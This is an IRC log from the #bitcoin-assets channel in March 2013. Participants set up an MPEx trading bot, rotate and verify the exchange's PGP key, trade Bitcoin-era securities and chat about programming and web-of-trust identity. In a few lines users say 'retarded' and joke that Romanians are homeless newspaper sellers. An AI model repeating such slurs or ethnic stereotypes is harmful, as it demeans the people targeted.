entry successful. Your rating of 1 for user benkay has been recorded. Mar 10 19:58:05 my first rating! Mar 10 19:58:16 congrats :) Mar 10 19:58:51 ;;rate kakobrekla 1 mpex socket hookup Mar 10 19:58:52 Rating entry successful. Your rating of 1 for user kakobrekla has been recorded. Mar 10 19:59:11 thanks Mar 10 20:01:09 Pardon FabianB: seen just now. There's no brew formula for ruby 1.9. I guess I have to wait... Mar 10 20:01:47 ah my mistake the chart i was viewing says top pools that are 'asic ready' Mar 10 20:01:49 http://organofcorti.blogspot.com/ Mar 10 20:02:18 Hey all. So I think I'm just gonna play with this thing a bit today, but it should be a lot less testing in here. I'm gonna change this thing so when it just sits in here, it looks for a msg from the owner defined by a pgp keyid and it'll verify with gribble via keyid & hostmask & if authenticated currently. Mar 10 20:03:06 Then it can just msg mpexbot and get the stuff back without the additional join/part spammyness. Mar 10 20:03:16 That code from yesterday worked, but kinda fucks a donkey. Mar 10 20:03:20 =) Mar 10 20:03:47 i wish the devs I work with were as honest as you. Mar 10 20:03:49 only mod6 smiles about fucking donkeys Mar 10 20:04:09 humility Mar 10 20:04:17 i dunno, donkey shows are pretty big in the mexico Mar 10 20:04:20 my favorite coders are ultra humble Mar 10 20:04:26 mine too Mar 10 20:04:34 i seek to emulate that Mar 10 20:05:02 i'm lucky, my team is quite humble, except for the crappy two. they fuck everything up and spend a whole sprint doing one shite feature. Mar 10 20:05:18 fire them Mar 10 20:05:18 which everyone else fixes in the next sprint Mar 10 20:05:27 are they shit or juniors? Mar 10 20:05:32 I think she is leaving, I saw her updating her resume last week, AT WORK. Mar 10 20:05:37 she is not bright. Mar 10 20:05:47 juniors Mar 10 20:05:47 sad Mar 10 20:06:04 but *could* they be trained into high performers? Mar 10 20:06:23 [BTCTC] [B.YABMC] 1 @ 0.01111 BTC [-] Mar 10 20:06:25 [BTCTC] [B.YABMC] 99 @ 0.0111 = 1.0989 BTC [-] Mar 10 20:06:25 i'm only moderately competent due to the generosity of senior engineers at every firm i've ever been a part of. Mar 10 20:06:35 w/r/t time, energy... Mar 10 20:06:39 no. :( Mar 10 20:08:27 fire them. Mar 10 20:09:01 what kind of shop do work in? Mar 10 20:10:18 lol, its been so long since i've written anything that interacts with irc. its kinda fun to write something like this. 250 million internet years ago, when the aol ice caps were still melting, I used Net::IRC a bunch, but now its deprecated. :/ Mar 10 20:10:53 this new lib seems to do the trick though Mar 10 20:11:37 the aol ice caps, lol Mar 10 20:11:54 theres a few left, adrift in the north seas, they're like retarded unicorns Mar 10 20:12:03 haha Mar 10 20:12:12 yes. Mar 10 20:12:16 gabridome: yep, wait or use http://rvm.io or compile yourself Mar 10 20:12:18 i cringe when someone has @aol.com email Mar 10 20:12:37 FabianB: I've succeded to compile it with the new version of Xcode!!! Now it gives me errors about No definition for rb_s_gpgme* maybe is the ruby version... Mar 10 20:14:40 benkay: it's an AGILE/SCRUM team about 12 big, doing vetconnectplus.com Mar 10 20:14:51 gabridome: with xcode? ok. Mar 10 20:15:02 gabridome: well, you need > 1.9 Mar 10 20:15:21 it aggregates data from local vetinary machines and labs sent to regional labs, displays it altogether one historical graphs for vetinary diagnoses Mar 10 20:15:23 and gpg needs to installed Mar 10 20:15:37 WHAT DEADWEASAL LETS GET BEERS Mar 10 20:15:53 assuming you're working out of the idexx facility in portland Mar 10 20:15:58 haha, yes Mar 10 20:16:03 omgaweseom Mar 10 20:16:05 westbrook Mar 10 20:16:11 omgawesome Mar 10 20:16:36 lmao Mar 10 20:16:43 benkay: where are you? Mar 10 20:16:49 Sincerly FabianB: thank you for your assistance but to manage more than one version of ruby or to compile Ruby on a non Linux environment is much further my knowledge. I'll wait a bit if brew issue a new formula for Ruby Mar 10 20:17:14 gabridome: np Mar 10 20:17:39 ruby Mar 10 20:17:59 np? Mar 10 20:18:17 ah no problem. Mar 10 20:19:25 what Mar 10 20:19:26 if i'm around i like to help, but i probably won't support 1.8, since it's old and no good irc libs out for it Mar 10 20:20:06 also in a high speed train right now, not really stable internet :) Mar 10 20:20:13 yeah I guessed it. better to wait for better libs Mar 10 20:21:07 http://mpex.coinbr.com/ on line! Am I drunk? Mar 10 20:22:06 nope Mar 10 20:22:06 Rick__: ^^ Mar 10 20:22:08 *cheers* Mar 10 20:22:29 sweet. Mar 10 20:22:38 applause for jurov. Mar 10 20:23:00 oh, that remains to be seen Mar 10 20:23:24 clap clap. Is it possible to remove:"The only Bitcoin service that has never been hacked. Established August 2011" it looks strange... ;) Mar 10 20:23:46 strange, how ? :D Mar 10 20:24:07 [BTCTC] [BTC-TRADING-PT] 99 @ 0.1737 = 17.1963 BTC [+] Mar 10 20:24:43 I swear I swear that I wanted to bet... Mar 10 20:26:29 I have to modify my shell script.. Mar 10 20:29:21 changed my shell script: https://github.com/gabridome/mpex-sh/blob/master/mpex.sh Mar 10 20:30:02 [HAVELOCK] [SDICE] 2 @ 0.60499999 = 1.21 BTC [+] Mar 10 20:35:51 did the mpex ddos'er at least pay a subscription fee to MP? Mar 10 20:36:00 seems unfair if not Mar 10 20:36:41 Lyspooner lol how do you figure ? Mar 10 20:36:48 also kakobrekla, mind changing the topic ? Mar 10 20:38:07 "These keys are only used when there are other recipients given either by use of --recipient or by the asked user id. No trust checking is performed for these user ids and even disabled keys can be used." Mar 10 20:38:12 lol, woops Mar 10 20:40:20 Lyspooner, like, he issued gigabytes of STAT requests? Mar 10 20:41:14 gabridome: pull request ;) Mar 10 20:41:31 FabianB: your mpex gem is excellent Mar 10 20:42:58 oh hey mircea_popescu, you should ident and repost the new keyid Mar 10 20:43:11 okay Mar 10 20:43:15 so we know it's fo' realzies Mar 10 20:43:18 ;;eauth mircea_popescu Mar 10 20:43:19 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Mar 10 20:43:24 (you know it was published ion trilema a while back) Mar 10 20:43:43 did not know, is trilema back up? Mar 10 20:44:01 [HAVELOCK] [SDICE] 2 @ 0.60499999 = 1.21 BTC [+] Mar 10 20:44:06 ;;everify freenode:#bitcoin-otc:3b6fd8223825264e5fc51a61232399173363cd6a3672c77d8374c3e7 Mar 10 20:44:07 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Mar 10 20:44:24 aha. ok so : new mpex key 3D57448E80A56F64F1D35E8F14460196CFE0F3E1 / CFE0F3E1 Mar 10 20:44:36 also mpex.coinbr.com back online Mar 10 20:45:01 smickles nope Mar 10 20:45:27 mpex PUSH is awesome :D Mar 10 20:49:21 coinbr still down though eh Mar 10 20:49:31 why a new key? Mar 10 20:49:42 not processing orders anyway Mar 10 20:49:45 I noticed it was rejecting my orders Mar 10 20:49:45 cause he's too lasy to extend expiration Mar 10 20:50:30 dub make sure you're using new mpex key/ Mar 10 20:50:35 pizzaman1337 cause the old one expired Mar 10 20:50:56 and it was too short anyway Mar 10 20:50:57 like ziz? Mar 10 20:50:58 mircea_popescu: using coinbr ont the proxy Mar 10 20:51:01 not* Mar 10 20:51:09 a, coinbr sucks, don't use it Mar 10 20:51:30 smickless: remember to change youKeyID and to put eventually the esclamation point Mar 10 20:52:02 dub but seriously, will be back momentarily. Mar 10 20:53:02 [HAVELOCK] [SDICE] 1 @ 0.60499999 BTC [+] Mar 10 20:54:03 [HAVELOCK] [SDICE] 1 @ 0.60499997 BTC [-] Mar 10 20:54:04 [HAVELOCK] [SDICE] 1 @ 0.60499998 BTC [+] Mar 10 20:54:06 [HAVELOCK] [SDICE] 2 @ 0.605 = 1.21 BTC [+] Mar 10 20:56:02 [HAVELOCK] [SDICE] 1 @ 0.60499999 BTC [-] Mar 10 20:58:02 [HAVELOCK] [SDICE] 1 @ 0.60499999 BTC [-] Mar 10 20:58:04 [HAVELOCK] [SDICE] 1 @ 0.605 BTC [+] Mar 10 21:01:26 [BTCTC] [BTC-TRADING-PT] 3 @ 0.18 = 0.54 BTC [+] Mar 10 21:03:36 [MPEX] [S.DICE] 2758 @ 0.00598314 = 16.5015 BTC [+] Mar 10 21:05:19 mircea_popescu: gpg doesn't seem to be able to find that key for me, would you mind posting the key block somewhere? Mar 10 21:05:25 sure. Mar 10 21:06:03 [HAVELOCK] [SDICE] 1 @ 0.59999999 BTC [-] Mar 10 21:07:03 !mp http://dpaste.com/1018523/ Mar 10 21:07:04 Processing. Mar 10 21:07:06 Response: http://dpaste.com/1018524/plain/ Mar 10 21:07:39 pizzaman1337 http://pastebin.com/9M25zBr7 Mar 10 21:07:49 thanks Mar 10 21:08:03 [HAVELOCK] [SDICE] 2 @ 0.6 = 1.2 BTC [+] Mar 10 21:09:51 !mp http://dpaste.com/1018525/ Mar 10 21:09:51 Processing. Mar 10 21:09:54 Response: http://dpaste.com/1018527/plain/ Mar 10 21:12:55 !mp http://dpaste.com/1018529/ Mar 10 21:12:56 Processing. Mar 10 21:12:58 Response: http://dpaste.com/1018530/plain/ Mar 10 21:13:44 !mp http://dpaste.com/1018531/ Mar 10 21:13:45 Processing. Mar 10 21:13:47 Response: http://dpaste.com/1018532/plain/ Mar 10 21:14:02 [HAVELOCK] [SDICE] 1 @ 0.60499998 BTC [+] Mar 10 21:14:55 nice to see S.DICE up a bit Mar 10 21:16:01 [HAVELOCK] [SDICE] 1 @ 0.60499998 BTC [+] Mar 10 21:16:03 [HAVELOCK] [SDICE] 2 @ 0.60499999 = 1.21 BTC [+] Mar 10 21:17:52 kakobrekla did it work ? Mar 10 21:18:02 [HAVELOCK] [SDICE] 2 @ 0.60499998 = 1.21 BTC [-] Mar 10 21:18:03 [HAVELOCK] [SDICE] 3 @ 0.60499999 = 1.815 BTC [+] Mar 10 21:18:19 who what where? Mar 10 21:18:24 the bot, works. Mar 10 21:18:59 [BTCTC] [COGNITIVE] 1 @ 0.225 BTC [+] Mar 10 21:19:02 [HAVELOCK] [SDICE] 1 @ 0.60499998 BTC [-] Mar 10 21:20:47 a kk. Mar 10 21:21:02 [HAVELOCK] [SDICE] 1 @ 0.60499998 BTC [-] Mar 10 21:21:03 [HAVELOCK] [SDICE] 4 @ 0.60499999 = 2.42 BTC [+] Mar 10 21:21:05 [HAVELOCK] [SDICE] 2 @ 0.605 = 1.21 BTC [+] Mar 10 21:21:42 [MPEX] [S.DICE] 846 @ 0.00599989 = 5.0759 BTC [+] Mar 10 21:21:48 [MPEX] [S.DICE] 1654 @ 0.006 = 9.924 BTC [+] Mar 10 21:22:36 mircea_popescu:the new key is 1024 long and has no expiry date. Is it ok? Mar 10 21:23:03 dont bother asking the fingerprint, just the lenght and expiry date Mar 10 21:23:24 it has no expiry date but it's 4kb Mar 10 21:24:16 key ID: 14460196CFE0F3E1? Mar 10 21:24:19 kakobrekla: bot to arb S.DICE on mpex/havelock? Mar 10 21:24:26 maximian: thanks, if you have any suggestions i'll constantly try to improve it Mar 10 21:24:39 gabridome sounds right. Mar 10 21:25:04 pizzaman1337 it should be done, but depth is kinda meh Mar 10 21:25:17 speaking of Mar 10 21:25:20 yeah, really small Mar 10 21:25:39 topace_: looks like your mpex transfer script needs to look for the sig by the new mpex key Mar 10 21:25:40 so I guess gpg tools keyring doesn't read well the lenght(?) mmhhh Mar 10 21:25:57 pigeons doing manual arb? Mar 10 21:25:59 I've got to check something Mar 10 21:26:17 gabridome the old one was 1k/4k Mar 10 21:26:21 im sorry. 1k/2k Mar 10 21:26:26 thios one is 1k/4k. Mar 10 21:28:20 [BTCTC] [ASICMINER-PT] 1 @ 0.71997 BTC [-] Mar 10 21:31:25 yeah..Beg your pardon. You should be tierd to answer question to newbies. I didn't check the subkeys... Mar 10 21:31:33 i don't mind Mar 10 21:31:58 [BTCTC] [S.MPOE-PT] 3 @ 0.000725 = 0.0022 BTC [+] Mar 10 21:32:09 [BTCTC] [GSDPT] 35 @ 0.00549 = 0.1922 BTC [-] Mar 10 21:33:49 [BTCTC] [S.MPOE-PT] 12 @ 0.00066 = 0.0079 BTC [-] Mar 10 21:34:43 [BTCTC] [S.DICE-PT] 50 @ 0.00585 = 0.2925 BTC [-] Mar 10 21:36:11 [BTCTC] [BTC-BOND] 37 @ 0.00999 = 0.3696 BTC [+] Mar 10 21:37:14 Here's something interesting - the average SatoshiDice bet size doesn't appear to relate to the BTC/USD exchange rate as many assume. Analysis by dooglus: https://bitcointalk.org/index.php?topic=80312.msg1606184#msg1606184 Mar 10 21:38:38 I've updated the shell script with the id of the new key https://github.com/gabridome/mpex-sh/blob/master/mpex.sh Mar 10 21:38:44 [BTCTC] [S.DICE-PT] 15 @ 0.00585 = 0.0878 BTC [-] Mar 10 21:38:46 it could be that the rise in the exchange rate is being offset by more players Mar 10 21:42:43 maximian interesting. Mar 10 21:42:47 when was that released ? Mar 10 21:43:01 today Mar 10 21:43:08 might explain the s.dice surge Mar 10 21:44:09 could be… we might see a nice recovery back to the .0070s Mar 10 21:44:45 big wall at 0.00622500 though Mar 10 21:46:58 yep, and trade volume is still light. probably no big moves without some news. Mar 10 21:47:27 [BTCTC] [ASICMINER-PT] 1 @ 0.71997 BTC [-] Mar 10 21:48:41 still, nice to see some some demand return Mar 10 21:50:09 [MPEX] [S.MPOE] 2000 @ 0.00075 = 1.5 BTC [+] Mar 10 21:51:18 [BTCTC] [ASICMINER-PT] 1 @ 0.71998 BTC [+] Mar 10 21:53:12 [BTCTC] [ASICMINER-PT] 1 @ 0.71998 BTC [+] Mar 10 21:55:01 [BTCTC] [ASICMINER-PT] 7 @ 0.7 = 4.9 BTC [-] Mar 10 21:58:13 [BTCTC] [BTC-TRADING-PT] 2 @ 0.1799 = 0.3598 BTC [-] Mar 10 21:59:58 [BTCTC] [COGNITIVE] 6 @ 0.23 = 1.38 BTC [+] Mar 10 22:00:27 [BTCTC] [ASICMINER-PT] 2 @ 0.69 = 1.38 BTC [-] Mar 10 22:00:29 [BTCTC] [ASICMINER-PT] 1 @ 0.68 BTC [-] Mar 10 22:00:31 [BTCTC] [ASICMINER-PT] 1 @ 0.67 BTC [-] Mar 10 22:00:33 [BTCTC] [ASICMINER-PT] 3 @ 0.66 = 1.98 BTC [-] Mar 10 22:00:35 [BTCTC] [ASICMINER-PT] 2 @ 0.65 = 1.3 BTC [-] Mar 10 22:00:37 [BTCTC] [ASICMINER-PT] 2 @ 0.65 = 1.3 BTC [-] Mar 10 22:00:46 pigeons: yea, i need to get that new key in there Mar 10 22:01:06 gotta find the details on it.. since mpex is down i dont know where to look Mar 10 22:01:16 (mpex.co website down, i mean) Mar 10 22:02:54 is there a working mpex proxy besides the bot here? Mar 10 22:03:27 lol mined 50 Ltc last night dumping it now Mar 10 22:03:30 can't even get to mp's blog to get the gpg key data Mar 10 22:04:17 yeah I miss polimedia Mar 10 22:04:31 [BTCTC] [ASICMINER-PT] 5 @ 0.7 = 3.5 BTC [+] Mar 10 22:06:20 https://github.com/jurov/pyMPEx new mpex key was not done properly, changing mpex url via -m commandline switch Mar 10 22:06:37 topace yes, mpex.coinbr.com works Mar 10 22:06:40 also, key : Mar 10 22:06:47 http://pastebin.com/9M25zBr7 Mar 10 22:07:06 whats up jurov how you been? Mar 10 22:07:20 i mean topace_ ^ Mar 10 22:07:55 that was a nice experience, ltc into btc-e, traded for btc, and gone back to coinbr in less than a half hour Mar 10 22:08:11 mjr_ well, i got sick of the whole situation (as if i catched cold) Mar 10 22:08:30 what situation? Mar 10 22:10:17 mircea_popescu: please confirm fingerprint: 3D57 448E 80A5 6F64 F1D3 5E8F 1446 0196 CFE0 F3E1 ? Mar 10 22:10:38 3D57448E80A56F64F1D35E8F14460196CFE0F3E1 / CFE0F3E1 yeh Mar 10 22:11:02 released mpex cli 0.4.5 which includes new mpex key in default config, basic orderbook in http and irc version (https://github.com/fawuxi/mpex) Mar 10 22:11:20 mjr_ had to very quickly move whole site and learn how amazon ec2 works Mar 10 22:11:26 if there are existing users: key can be changed in ~/.mpex/config.yaml Mar 10 22:15:01 [BTCTC] [COGNITIVE] 2 @ 0.23 = 0.46 BTC [+] Mar 10 22:21:37 pympex keeps telling me invalid signature,. but i have the new one in my keyring, and its signed Mar 10 22:23:45 oh its telling me to email you my public key first Mar 10 22:23:51 2013-03-10T16:21:04.028098 Unrecognized signature. Please email your public key first. Mar 10 22:24:13 topace_: did you edit in the new one in the source? Mar 10 22:24:19 topace, did you upgrade to my versionabove? Mar 10 22:24:29 jurov: yes i did just did a fresh git clone Mar 10 22:24:44 hm Mar 10 22:25:30 pympex works for me, I just edited the key. Make sure you sign the new one too. Mar 10 22:25:49 ah there we go Mar 10 22:25:56 got it Mar 10 22:27:42 [MPEX] [S.DICE] 2000 @ 0.0059998 = 11.9996 BTC [-] Mar 10 22:29:02 [HAVELOCK] [SDICE] 5 @ 0.602 = 3.01 BTC [-] Mar 10 22:29:03 [HAVELOCK] [SDICE] 5 @ 0.601 = 3.005 BTC [-] Mar 10 22:29:05 [HAVELOCK] [SDICE] 9 @ 0.600002 = 5.4 BTC [-] Mar 10 22:29:06 [HAVELOCK] [SDICE] 5 @ 0.6 = 3 BTC [-] Mar 10 22:29:07 [HAVELOCK] [SDICE] 3 @ 0.59 = 1.77 BTC [-] Mar 10 22:29:12 pigeons: mpex transfer should work again now Mar 10 22:42:25 [BTCTC] [BTC-BOND] 14 @ 0.00999 = 0.1399 BTC [+] Mar 10 22:45:02 [HAVELOCK] [SDICE] 10 @ 0.59 = 5.9 BTC [-] Mar 10 22:47:02 [HAVELOCK] [SDICE] 5 @ 0.59 = 2.95 BTC [-] Mar 10 22:47:09 what that, two klins? Mar 10 22:49:01 [HAVELOCK] [SDICE] 8 @ 0.59 = 4.72 BTC [-] Mar 10 22:56:00 [BTCTC] [COGNITIVE] 1 @ 0.19 BTC [-] Mar 10 22:56:02 [BTCTC] [COGNITIVE] 31 @ 0.1853 = 5.7443 BTC [-] Mar 10 22:56:04 [BTCTC] [COGNITIVE] 8 @ 0.18521 = 1.4817 BTC [-] Mar 10 22:58:20 rule 1 of amurika, thou shalt not disparage driving around in a circle http://sportsillustrated.cnn.com/racing/news/20130308/nascar-fine-denny-hamlin-las-vegas-preview/ Mar 10 22:59:11 dub the funny thing is, one of the things american ppl in england tend to mock is the roundabouts Mar 10 22:59:12 and yet... Mar 10 22:59:40 i'm american, I love roundabouts Mar 10 23:00:07 well maybe i was stereotyping unwarrantedly. Mar 10 23:00:28 gonna drive straight, then turn to the left Mar 10 23:00:52 turning right is the devils work Mar 10 23:00:54 did you see that South Park? Mar 10 23:02:09 [BTCTC] [ASICMINER-PT] 10 @ 0.7 = 7 BTC [+] Mar 10 23:12:22 mircea_popescu: so i just got a push receipt, that validates, but there arent any extra units in my account to account for the push? Mar 10 23:12:49 that is strange. let me look Mar 10 23:12:51 ;;ident topace_ Mar 10 23:12:52 Nick 'topace_', with hostmask 'topace_!~kvirc@CPEc0c1c03be745-CM00407b85cf6f.cpe.net.cable.rogers.com', is not identified. Mar 10 23:12:56 id please ? Mar 10 23:13:23 [MPEX] [S.DICE] 60 @ 0.0059998 = 0.36 BTC [-] Mar 10 23:13:23 08AEAC40F3086E6131B39762A49472A32D4FCE50 Mar 10 23:14:22 if you can't id with that i'll have to ask you to sign something. Mar 10 23:14:44 ;;ident topace Mar 10 23:14:44 Nick 'topace', with hostmask 'topace!~kvirc@unaffiliated/topace', is not identified. Mar 10 23:14:56 ;;ident topace_ Mar 10 23:14:56 Nick 'topace_', with hostmask 'topace_!~kvirc@unaffiliated/topace', is not identified. Mar 10 23:15:00 hmm guess i never setup gpg with gribble Mar 10 23:15:29 sign a short explanation, date it, limit it and pastebin Mar 10 23:15:47 "this is to prove key ownership over irc session 10 mar 2013 not valid for any other purpose" Mar 10 23:17:29 http://paste.ubuntu.com/5603186/ Mar 10 23:24:00 how do i link a btc address with gribble? Mar 10 23:24:06 ;;identr Mar 10 23:24:06 Error: "identr" is not a valid command. Mar 10 23:24:08 ;;ident Mar 10 23:24:08 You are not identified. Mar 10 23:25:54 ;;ident Mar 10 23:25:55 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address None Mar 10 23:32:55 so i can't find any info on the wiki about adding a bitcoin address Mar 10 23:34:23 Josh_Rossi: care to elaborate on what you're trying to do? Mar 10 23:36:49 add btc address to his otc user I think Mar 10 23:36:57 ;;guide Mar 10 23:36:58 Error: "guide" is not a valid command. Mar 10 23:40:19 ;;ident Mar 10 23:40:19 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address 1LokQrHj14NU93tC6pZfTZyyRHhAVakQmX Mar 10 23:40:36 its ;;changeaddress Mar 10 23:40:36 thanks guys Mar 10 23:40:51 yeah, i got it, i thought that was going to change my pgp address Mar 10 23:40:53 the docs are retarded Mar 10 23:41:07 but i realized that you are just changing the btc address from none to whatever Mar 10 23:41:20 well, i got that all taken care of Mar 10 23:41:52 so can you ident via bitcoin key now? Mar 10 23:42:38 i think so Mar 10 23:42:41 yes Mar 10 23:42:47 do ;;bcauth and when you get the string Mar 10 23:42:50 sign it with the btc addr Mar 10 23:42:53 but i already set up a script to do it with pgp Mar 10 23:42:56 then do ;;bcverify Mar 10 23:43:02 bitcoin is so much better imo Mar 10 23:43:02 xD Mar 10 23:43:13 i havent touched my gpg since that Mar 10 23:43:25 !help Mar 10 23:43:25 List of commands: Mar 10 23:43:26 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 10 23:43:27 !mp (desc: returns the response from MPEX order) Mar 10 23:43:32 !ticker mpex s.dice Mar 10 23:43:34 [MPEX:S.DICE] 1D: 0.005884 / 0.00594534 / 0.006 (30318 shares, 180.25 BTC), 7D: 0.00300001 / 0.0056036 / 0.006225 (414146 shares, 2,320.71 BTC), 30D: 0.00300001 / 0.00616133 / 0.0069 (3639066 shares, 22,421.49 BTC) Mar 10 23:43:38 well, i kind of want to start using pgp for certain emails Mar 10 23:44:34 i had a long discussion with someone about how online identities may become much more valuable than social security numbers or drivers licenses Mar 10 23:44:54 because while you do need those Mar 10 23:45:03 you don't use them as often as you go online Mar 10 23:45:12 certainly true. Mar 10 23:45:12 that's why you start creating few seperate identities Mar 10 23:45:20 and for the most part in real life, people trust you to be you cuz you look the same Mar 10 23:45:31 moreover, if i lost my id i would be meh, send someone to get a new one Mar 10 23:45:37 if i lost my gpg key i'd be like... Mar 10 23:45:40 o god. Mar 10 23:45:42 hehehe yeah Mar 10 23:45:43 there's no words. Mar 10 23:46:01 scary thought Mar 10 23:46:08 amnesia Mar 10 23:46:11 is there some sort of certificate system? Mar 10 23:46:18 car accident or what Mar 10 23:46:34 like key signing? or does gribble basically do that for us Mar 10 23:47:05 i mean fulfill the role that a key signing party would have fulfilled Mar 10 23:47:31 i literally feel like i'm living cryptonomicon Mar 10 23:49:13 i assume that everyone has read or is aware of that book...but if not it is amazing book about cryptography and digital currencies that was written before btc took off i think Mar 10 23:49:28 Josh_Rossi you mean the wot ? Mar 10 23:49:36 yeah '99 it was written Mar 10 23:49:50 yes, does the WoT take the role of a key signing party Mar 10 23:49:59 or a certificate authority Mar 10 23:50:05 um Mar 10 23:50:17 rather than the nominalist approach, try the functional Mar 10 23:50:20 what are you trying to do ? Mar 10 23:50:29 lol, as of right now, nothing Mar 10 23:50:30 no, wot is just a wot Mar 10 23:50:49 or i guess more accurately, learn more about how trust and cryptography are related Mar 10 23:50:57 for example Mar 10 23:51:18 i saw MPOE-PR show a sig that verified that she was authorized to speak on behalf of MPOE Mar 10 23:51:35 So, I imported your key Mar 10 23:51:40 and verified that you signed it Mar 10 23:52:30 aha Mar 10 23:53:03 but it also said something like "this message is signed by this key, but that does not mean that it is really him" Mar 10 23:53:22 that's nonsense. Mar 10 23:53:28 no no no Mar 10 23:53:34 what they mean is, anyone can create a key which would be named "Joe" Mar 10 23:53:38 someone with access to that private key Mar 10 23:53:41 yes exactly Mar 10 23:53:44 however, you didn't identify the key by it being named joe Mar 10 23:53:46 Josh_Rossi: yeah stephensons cryptonomicon is a fantastic book Mar 10 23:53:52 you identified it by my keyid. so... Mar 10 23:54:15 i guess they are saying that while that key is definitely valid Mar 10 23:54:31 the label on it is arbitrary Mar 10 23:54:49 yes true Mar 10 23:54:56 exactly. Mar 10 23:54:57 :p Mar 10 23:54:57 and in your case, it is known that that is your key Mar 10 23:55:04 but in the case of someone else Mar 10 23:55:15 ya hence the key signing parties and whatnot. Mar 10 23:55:15 all i know is that they say "this is my pub key" Mar 10 23:55:30 originally these keys were invented for and used by people whose real world presence was more important to each other Mar 10 23:55:38 gpg kinda predates the internet Mar 10 23:55:45 yeah Mar 10 23:56:12 just checking if i understood it correctly Mar 10 23:56:23 i trust that they key i used was really you Mar 10 23:56:40 for us it doesnt matter if its really him Mar 10 23:56:40 and then i can see that the key actually signed that statement Mar 10 23:56:49 or that he is who he says he is Mar 10 23:56:50 that's the idea, whart dub says Mar 10 23:57:07 you're not really verifying that the key is really this bloke in timisoara you couldn't care less about Mar 10 23:57:18 you're really veryifying that the key signing here is the same key signing there Mar 10 23:57:21 as for instance on mpex etc. Mar 10 23:57:22 yes of course Mar 10 23:57:44 so it's an identity in that more mathematical sense, not in the more psychological sense of the term. Mar 10 23:57:46 that is what i was trying to say, that it is consistent across different channels Mar 10 23:58:15 the same person who runs mpex also wrote a statement saying that mpoe-pr is authorized to speak on its behalf Mar 10 23:58:32 yah Mar 10 23:58:42 if that matches, it could be called obama for all you care. Mar 10 23:58:45 yes Mar 10 23:58:47 true Mar 10 23:59:40 i'm trying to build a ticker now using websockets Mar 10 23:59:52 but the rest of the front end uses C# Mar 11 00:00:09 so i have to write a web based tech thing in a desktop application language that is not great for it Mar 11 00:00:32 i found some libraries, but trying to get javascript and c# working together is not fun Mar 11 00:01:41 ;;ticker Mar 11 00:01:42 BTCUSD ticker | Best bid: 46.34000, Best ask: 46.39990, Bid-ask spread: 0.05990, Last trade: 46.34000, 24 hour volume: 35159.39827638, 24 hour low: 45.63000, 24 hour high: 47.95000, 24 hour vwap: 46.92297 Mar 11 00:01:45 omg Mar 11 00:01:46 crash Mar 11 00:01:54 lol Mar 11 00:02:21 FabianB: yes, i really like all his books (except Anathem) and think it is amazing how prescient it is Mar 11 00:03:04 huh? c# is easy to integrate with the JS Mar 11 00:03:09 really? Mar 11 00:03:21 create an ajax service Mar 11 00:03:21 aren't they basically the same thing ?! Mar 11 00:03:40 C# is similar to Java Mar 11 00:03:53 javascript is not similar to javascript or C# really... Mar 11 00:04:14 http://sharpkit.net/ like Mar 11 00:04:15 Bowjob: would you mind saving this tanking/rally rubbish every time a trade occur for #bitcoin-otc Mar 11 00:04:19 and with trying to connect to Socket.IO, you are basically trying to send javascript commands to a server Mar 11 00:04:33 i use vs2012 it was a snap Mar 11 00:04:38 no, i like doing it Mar 11 00:04:50 i always tghought js and c# are practically the same thing Mar 11 00:05:10 Bowjob: so do they, why not share with teh other idiots Mar 11 00:05:11 i am using vs2012 too Mar 11 00:05:15 c# is a better version of java, but the java world is much better. hell i love osx Mar 11 00:05:24 well what are you gonna do about it Mar 11 00:05:25 i am not a fan of either Mar 11 00:05:34 Bowjob: I'll start to dislike you Mar 11 00:05:39 go ahead Mar 11 00:05:50 my roots are more like scripting and stuff, so i love python and dynamic typing Mar 11 00:06:08 tbh that started when you were crying to us about your parents moving your piano downstairs with teh other pianos Mar 11 00:06:10 but if i was going to bother with types, i would want to actually compile to the native code Mar 11 00:06:23 in an enterprise enviroment with too many monkey that code, its better to have a strongly typed language Mar 11 00:06:27 right. i'm still mad about that Mar 11 00:06:30 of all the ridiculous problems a person could have Mar 11 00:06:51 yeah, i suppose that is true, i basically do all coding by myself Mar 11 00:06:58 and just want it to work Mar 11 00:07:09 this conversation o.o Mar 11 00:07:30 drama in #bitcoin-assets :) Mar 11 00:08:44 i think its so fun Mar 11 00:09:05 such a thrill when something works...and the design part can be creative... Mar 11 00:09:21 feel like you are building something, that many people could find useful Mar 11 00:09:48 I'm always annoyed to be fixing a problem that should already be solved Mar 11 00:10:02 hehehe, i usually google for libraries that do what i need Mar 11 00:10:31 our 3 C++ developers are Romanian Mar 11 00:11:36 big surprise there Mar 11 00:12:47 our 3 homeless newspaper sellers outside the subway are Romanian Mar 11 00:12:58 and hello everyone! Mar 11 00:13:44 [BTCTC] [ASICMINER-PT] 2 @ 0.7 = 1.4 BTC [+] Mar 11 00:15:13 i guess there is no way to write options on coinbr? Mar 11 00:15:42 ;;ticker Mar 11 00:15:47 BTCUSD ticker | Best bid: 46.13000, Best ask: 46.37591, Bid-ask spread: 0.24591, Last trade: 46.37591, 24 hour volume: 35421.00568840, 24 hour low: 45.63000, 24 hour high: 47.95000, 24 hour vwap: 46.91767 Mar 11 00:16:35 ;;calc (46.91767-41)/46.91767 Mar 11 00:16:40 lol Mar 11 00:16:49 0.12612881245 Mar 11 00:17:34 was that not correct for the formula? Mar 11 00:18:09 that'd be the value of a call struck at 41 Mar 11 00:18:42 yep thats mine :) Mar 11 00:19:04 i'm not good at charts, but this index seems particularly unuseful: http://bitcoinsentiment.com/ Mar 11 00:19:56 its usefulness is stuck in a tarpit of bias, small sample size and stupidity Mar 11 00:20:36 that is why i love the OIX Mar 11 00:20:50 money votes a lot more honestly than opinions Mar 11 00:21:17 ;;ticker m oix Mar 11 00:21:29 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Mar 11 00:21:54 nevermind Mar 11 00:22:49 !ticker s.mpoe Mar 11 00:22:49 